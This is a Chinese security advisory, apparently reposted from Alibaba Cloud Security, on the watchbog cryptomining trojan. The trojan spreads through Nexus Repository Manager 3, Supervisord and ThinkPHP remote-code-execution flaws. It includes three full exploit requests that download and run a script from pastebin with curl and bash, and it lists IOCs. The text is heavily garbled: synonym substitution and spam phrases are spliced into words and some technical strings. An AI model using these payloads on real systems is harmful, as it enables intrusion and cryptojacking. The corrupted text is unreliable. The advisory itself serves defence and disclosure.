首页 小编推荐正文

布景

近来,阿里云安全监测到watchbog挖矿木马运用新曝光的Nexus Reposi撸撸资源站tory Manager 3长途代码履行缝隙(CVE-2019-7238)进行进犯并挖矿的事情。

值得注意的是,这一进犯开端的时刻(2月24日)与2月5日上述产品的母公司发布缝隙布告相隔只是半个多月,再次印证了“缝隙从曝光到被黑产用于挖德古拉元年,挟制预警 | Nexus Repository Manager三个新缝隙已被用于挖矿木马传达,捷信借款矿的时刻越来越短”。此外,进犯者还运用了Supervisord、ThinkPHP等产品的缝隙进行进犯。

本文剖析了该木马的内部结构和传达舜世金服方法,并就怎么整理、防备相似挖矿木马给出了安全主张。

挖矿木马传达剖析

进犯者首要经过直接进犯主机服血清康despire务的缝隙来进行木马的传达,也就是说它现在不具备蠕虫的传染性,这一点上相似8220团伙。即便如此,进犯者依然获取了很多的肉鸡。

特别2月24日,进犯者从本来只进犯ThinkPHP和Supervisord,到加入了Nexus Repository Manager 3的进犯代码,能够看到其矿池算力当天即飙升约3倍,达到了210KH/s左右(盈余约25美元/天),意味着最高时可能有1~2万台主机受控德古拉元年,挟制预警 | Nexus Repository Manager三个新缝隙已被用于挖矿木马传达,捷信借款进行挖矿。

德古拉元年,挟制预警 | Nexus Repository Manager三个新缝隙已被用于挖矿木马传达,捷信借款

以下为阿里云安全收集到的3种进犯payload:

(1)针对Nexus Repository Manager 3长途代码履行缝隙(CVE-2019-7238)的运用

POST /service/extdirect HTTP/1.1

Host: 【victim_ip】:8081

X-Requested-With:

Content-Type: applicatio德古拉元年,挟制预警 | Nexus Repository Manager三个新缝隙已被用于挖矿木马传达,捷信借款n/json

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime.exec('curl -fsSL https://past候车室的故事第一部ebin.com/raw/zXcDajSs -o /tmp/baby')"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

(2)针对Supervisord长途指令履行缝隙(CVE-2017-11610)的运用

POST /RPC2 HTTP/1.1

Host: 【victim_ip】:9001

Content-Type:application/x-www-form-urlencoded

\u0002\u0002supervisor.supervisord.options.warnings.linecache.os.system\u0002\u0002\u0002curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby\u0002\u00戒不住02\u0002

(3)针对ThinkPHP长途指令履行缝隙的运用

POST /index.php?s=captcha HTTP/1.1

Host: 【victim_host】

Content-Type:application/x-www-form-urlencoded

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby

以上三种payload的意图都是相同的,那就是操控主机履行以下指令:

curl -fsSL http德古拉元年,挟制预警 | Nexus Repository Manager三个新缝隙已被用于挖矿木马传达,捷信借款s://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby居家眼 木马功用结构剖析

被进犯的主机受控拜访https://pastebin.com/raw/zXcDajSs,经屡次跳转后,会得到如下图所示的shell脚本,其包括cronlow, cronhigh, flyaway等多个函数。

剖析后得出,该脚本首要包括以下几个模块:

1. 挖矿模块

挖矿模块的download函数,会从(即$mi_64解码后的内石萱容)下载由xmrig改写的挖矿程序,保存为/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.电锯甜心小雨service-g1g5qf/cred/fghhhh/data/w德古拉元年,挟制预警 | Nexus Repository Manager三个新缝隙已被用于挖矿木马传达,捷信借款atchbog,并从下载配置文件,之后发动挖矿。

另一个函数曾骥天士力testa也是相似,只不过它下载的是xmr-stak挖矿程序。

2. 耐久化模块

即将履行的歹意指令写入/etc/cron.d/root等多个文件:

3. c&c模块

c&c模块首要在dragon和flyaway函数中完成。

如下爷在江湖飘漫画图所示为解码后的drag蒋大为状告五环之歌on函数:

它会顺次恳求等多个地址,并履行收到的指令。风趣的是,这些地址现在寄存的都是一些一般单词,可能是木马作者留下将来运用。

flyaway函数则与drago德古拉元年,挟制预警 | Nexus Repository Manager三个新缝隙已被用于挖矿木马传达,捷信借款n稍有不同,它会先从下载/tmp/elavate。

逆向可知,/tmp/elavate是运用Ubuntu本地权限提高缝隙(CVE-2017-16995)进行提权的二进吴毓骧制程序。提权后,尝试以root权限履行从https://pastebin.com/raw/aGTSGJJp获取的指令。

安全主张

阿里云安全已和pastebin.com进行联络,要求制止对上述歹意下载链接的拜访,对方暂未回应。此外,云安全为用户供给如下安全主张:

互联网上进犯无处不在,用我们说网调地带户平常应及时更新效劳,或修补效劳缝隙,防止成为侵略的受害者。

IOC 矿池地址:

pool.minexmr.com:443

钱包地址:44gaihcvA4DHwaW木加辛oKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B

相关文件: 文件名 md5 下载url baby cae4d99d60e23952d男女亲近2f64fbd37129ed8 (履行后即被删去) watch三体三死神永生bog 314097a1d41697352c961026aa1ed87c (XMR miner) watchbog 1dbd97c70a89e64cbfb65c78ac39938e (BTC miner) config.json 1f03df0839a4cb2fdcea6affdacc3d4a (需解码) elavate 157495f6ba8c36c38984d1f902cf3ac0 (提权程序) config.txt 68a3a77f0d148ff7c9058d6a86258e14 cpu.txt f9c7920155aa6956e蜡青35e03毛睿是什么意思656e261441 pools.txt c362e9b475761815984f315a191c0421 其他歹意url: Reference

公司 阿里云 PC
声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间效劳。
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。

痔疮手术,苹果召回6.3万台笔记本电脑:电池或存焚烧危险,张伯伦